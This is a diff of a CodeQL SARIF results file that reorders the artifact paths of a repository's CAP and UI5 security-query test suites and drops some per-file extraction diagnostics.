"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 412 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 413 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "qlt.conf.json", - "uriBaseId" : "%SRCROOT%", - "index" : 414 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - 
"descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "scripts/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 415 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "scripts/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 416 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - } ], - "executionSuccessful" : true - } ], - "artifacts" : [ { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - } - }, { - "location" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - } - }, { - "location" : { - "uri" : 
".github/actions/install-codeql/action.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 5 - } - }, { - "location" : { - "uri" : ".github/actions/install-qlt/action.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 6 - } - }, { - "location" : { - "uri" : ".github/codeql/codeql-config.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 7 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 8 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 9 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 10 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 11 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 12 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 13 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 14 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 15 - } - }, { - "location" : { - "uri" : ".github/workflows/code_scanning.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 16 - } - }, { - "location" : { - "uri" : ".github/workflows/run-codeql-unit-tests-javascript.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 17 - } - }, { - "location" : { - "uri" : "codeql-workspace.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 18 
- } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/lib/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 19 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/lib/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 20 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/src/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 21 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 22 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 23 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 24 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 25 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 26 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 27 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 28 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 29 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 30 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 31 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 32 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 33 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 34 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 35 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 36 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 37 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 38 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 39 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 40 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 41 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 42 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 43 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 44 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 45 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 46 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 47 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", - 
"uriBaseId" : "%SRCROOT%", - "index" : 48 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 49 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 50 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 51 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 52 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 53 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 54 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 55 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/privileged-user.js", - "uriBaseId" : "%SRCROOT%", - "index" : 56 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 57 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 58 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 59 } @@ -40501,13 +14315,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", "uriBaseId" : "%SRCROOT%", "index" : 62 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", "uriBaseId" : "%SRCROOT%", "index" : 63 } @@ -40525,13 +14339,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 66 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 67 } 
@@ -40555,37 +14369,37 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 71 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 72 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 73 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 74 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 75 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", "uriBaseId" : "%SRCROOT%", "index" : 76 } 
@@ -40609,13 +14423,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 80 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 81 } @@ -40645,19 +14459,19 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 86 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 87 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 88 } 
@@ -40675,37 +14489,37 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 91 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", "uriBaseId" : "%SRCROOT%", "index" : 92 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 93 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 94 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 95 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 96 } 
@@ -40717,73 +14531,73 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", "index" : 98 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 99 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 100 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 101 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 102 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", "index" : 103 } }, { "location" : { - "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 104 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", "uriBaseId" : "%SRCROOT%", "index" : 105 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 106 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 107 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 108 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 109 } 
@@ -40795,37 +14609,37 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", "uriBaseId" : "%SRCROOT%", "index" : 111 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 112 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 113 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 114 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 115 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 116 } 
@@ -40843,37 +14657,37 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/src/qlpack.yml", + "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 119 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/ui5/src/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 120 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", + "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 121 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", "uriBaseId" : "%SRCROOT%", "index" : 122 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", "uriBaseId" : "%SRCROOT%", "index" : 123 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", "uriBaseId" : "%SRCROOT%", "index" : 124 } 
@@ -40915,25 +14729,25 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", + "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 131 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", + "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 132 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", + "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", "uriBaseId" : "%SRCROOT%", "index" : 133 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", "uriBaseId" : "%SRCROOT%", "index" : 134 } 
@@ -41107,31 +14921,31 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 163 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 164 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 165 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 166 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 167 } 
